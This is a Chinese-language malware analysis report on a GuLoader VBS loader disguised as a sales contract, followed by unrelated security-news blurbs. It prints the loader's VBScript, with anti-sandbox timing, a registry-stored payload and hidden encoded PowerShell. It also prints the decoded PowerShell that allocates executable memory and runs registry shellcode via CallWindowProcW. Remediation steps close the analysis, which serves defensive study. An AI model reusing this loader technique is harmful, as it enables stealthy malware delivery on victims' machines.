GuLoader_VBS恶意加载器分析报告

一颗小胡椒2022-03-05 15:48:33

文件信息

字段值文件名SALES-CONTRACT_PROFORMA-RFQ_UYRTR-84747392837_MARCH-EXPORT-DOCUMENTATION_2022.vbsMD56964c15109dfd8a657fc61c2589545a1SHA168d16237ed55a638edc3f3a1a71c099b0e7ce0e5文件类型VBS文件大小141796 bytes发现时间2022-03-03 08:25:13 UTC

过微步云沙箱

关键代码

Dim objshell, MyFile
Runderneth7="-NoExit -EncodedCommand "
PREV="Wscript.Shell"
SUBSI="%windir%"
Robe="HKEY_CURRENT_USER\Software\DORI\FORTOLKNIN"
NOMINER="\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Fragtetuds4="REG_SZ"
Sonder="Shell.Application"
SERAFERSH="Scripting.FileSystemObject"
... ...
Dim dteWait
dteWait = DateAdd("s", 8, Now())
'反调试及虚拟机‘
Do Until (Now() > dteWait)
SERAFERSH0 = SERAFERSH0 + 1
Loop
If SERAFERSH0 < 100 then 
msgbox "non"
end if 
'写注册表,实际就是被加载的后门程序'
objShell.RegWrite Robe,Tabulerin4,Fragtetuds4
Set sa = CreateObject(Sonder)
'检测系统中的powershell程序'
MyFile =  objShell.ExpandEnvironmentStrings(SUBSI) & NOMINER
'执行加载命令'
If CCA.FileExists(MyFile) = True then 
 sa.ShellExecute MyFile, Runderneth7 & chr(34) & epidiaop & chr(34), "", "", 0
else 
 sa.ShellExecute "powershell.exe", Runderneth7 & chr(34) & epidiaop & chr(34), "", "", 0
 Brud = CCA.GetFileName(MyFile)
end if

执行加载命令

首先解密拿到异或后的密文

Wsh.echo epidiaop
set fs =createobject("scripting.filesystemobject")
if (fs.fileexists("c:/3.txt")) then
set f =fs.opentextfile("c:/3.txt",8)
f.write epidiaop 
f.close
else
set f=fs.opentextfile("c:/3.txt",2, true)
f.write epidiaop 
f.close
end if

base64解密后

#Ranchss8 Udkas6 LEDTOGETUS Porterag KLDTESINT Stand Defi Foun4 Rytter3 KURFYR Undominica7 Moskeneerp Earthshatt skrabet Bule2 AFFRERNES 
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Pernitr1
{
[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint Lovsangci5,int Lovsangci6,int Lovsangci7,int Lovsangci8,int Lovsangci9);
[DllImport("user32.dll")]public static extern IntPtr DefWindowProcA(uint Pernitr0,int Pernitr1,int Pernitr2,int Pernitr3,int Pernitr4);
[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr Lovsangci1,ref Int32 Lovsangci2,int Lovsangci3);	
[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int Pernitr6,ref Int32 forkva,int Lovsangci,ref Int32 Pernitr,int chronosco,int Pernitr7);
}
"@
#Subgeomet4 Dossiermom ENTI elver KAUSALT Unapplied4 Upset6 CANA RONNIANTES Udmeldel6 Andronhom5 GAIU retsf Krisesitua schweizere UDLUDNINGE TAPR Jerngi  
$Pernitr3=0;
$Pernitr9=1048576;
$Pernitr8=[Pernitr1]::NtAllocateVirtualMemory(-1,[ref]$Pernitr3,0,[ref]$Pernitr9,12288,64)
$Unifo=(Get-ItemProperty -Path "HKCU:\Software\DORI").FORTOLKNIN
$OXALD = [System.Byte[]]::CreateInstance([System.Byte],$Unifo.Length / 2)
For($i=0; $i -lt $Unifo.Length; $i+=2)
	{
        $OXALD[$i/2] = [convert]::ToByte($Unifo.Substring($i, 2), 16)
    }
for($Afskrivnin=0; $Afskrivnin -lt $OXALD.count ; $Afskrivnin++)
{
	
[Pernitr1]::RtlMoveMemory($Pernitr3+$Afskrivnin,[ref]$OXALD[$Afskrivnin],1)
}
[Pernitr1]::CallWindowProcW($Pernitr3, 0,0,0,0)

总的关键三部分:

  • 外部调用类Pernitr1
  • 取出HKEY_CURRENT_USER\Software\DORI\FORTOLKNIN中的值,每两位16进制编码,写入申请的内存空间
  • 调用编码后的内存地址

动态运行

拿到C#编码后的DLL文件d1sfwusl.dll: 87d64fffc57ebf7956e7d04ac91bf405

间接的DLL->DLL调用库函数

被加载程序文件

知道从注册表取值方法,写个脚本,得到后门程序:d8f1cda2ae8d5de640e7d82dd47e07af

import base64
import struct
import re
result = re.sub(r"(?<=\w)(?=(?:\w\w)+$)", " ", model)
result = result.split(' ')
result = [int(x, 16) for x in result]
with open('backdoor', 'wb+') as f:
    for info in result:
        # f.write(base64.b64decode(info))
        s = struct.pack('B', info)
        f.write(s)

修复建议

  • 删除VBS程序
  • 删除临时目录下的d1sfwusl相关文件
  • 清除HKEY_CURRENT_USER\Software\DORI\FORTOLKNIN下的信息
  • 杀死后门程序
本作品采用《CC 协议》,转载必须注明作者和本文链接
GuLoader_VBS恶意加载分析报告
该漏洞于2022年12月22日被公开披露。目前有49名专家遭黑客攻击,所幸外交安全领域的主要信息并未外泄。与自然灾害相关的索赔预计将连续第二年超过1000亿美元。该组织自2018年被发现以来,持续发起针对哥伦比亚国家的政府部门、金融、保险等行业以及大型公司的定向攻击。
网络安全研究人员揭示了名为GuLoader的高级恶意软件下载采用多种技术来逃避安全软件。
研究人员报告了基于 shellcode 的下载程序 GuLoader 的新版本,它是上个月第四大最猖獗的恶意软件。发生了重大变化。上月,Qbot 和 Anubis 也都在相应排行榜上位居榜首。尽管 Microsoft 通过阻止 Office 文件中的宏运行来减缓恶意软件的传播,但 Qbot 运营组织已迅速调整其散播方式。
Group-IB 的最新发现显示,自 2023 年 4 月以来, WinRAR 压缩软件曝出一个关键的安全漏洞,被认为是一个已经被利用的零日漏洞。
WinRAR 上周修复了一个高危漏洞 CVE-2023-40477,该漏洞允许远程攻击者通过引诱受害者打开一个特制的 RAR 压缩文件去执行任意代码。安全公司 Group IB 周三公开了该漏洞的更多细节。该漏洞从今年四月起就开始被利用,攻击者通过证券交易论坛引诱受害者打开含有恶意代码的压缩文件,利用漏洞攻击者可以伪造文件扩展,在伪造的 .jpg 或 .txt 等文件格式中隐藏恶意脚本。当受害者打
Proofpoint的研究人员公布了一项关于Hakbit勒索软件的调查结果。当GuLoader运行时,它将下载并执行Hakbit,这是一种勒索软件,使用AES-256加密文件。截至本文撰写时,Proofpoint研究人员尚未找到任何人支付赎金的证据。Hakbit体现了以用户为中心的勒索软件活动,该活动针对特定的受众,角色,组织和用户的母语而定制。但是,安全专业人员应注意这一转变并做出相应计划,这是明智的。
AgentTesla 是一个非常活跃的窃密类恶意软件,主要通过电子邮件附件进行传播分发。攻击者正在尝试使用 Telegram 回传数据,但主要还是靠邮件服务器。
导语:在2023年Gartner终端安全发展规律周期中,自动移动目标防御(AMTD)崭露头角,虹科Morphisec被誉为AMTD领域的样本供应商。该周期呈现出终端安全领域的最新创新,旨在帮助安全领导者更好地规划、采纳和实施新技术。AMTD技术的预防性解决方案标志着网络安全迈出了新的一步,它以在攻击开始前预防和阻止攻击为主,不同于传统的检测和响应技术。 自动移动目标防御(AMTD)首次被
据相关消息,继 Zero Day Initiative(ZDI)之后,安全公司 Group-IB 于前日发布博文,披露了存在于WinRAR压缩软件中的零日漏洞CVE-2023-38831,已经在 6.23 版本中修复。
一颗小胡椒
暂无描述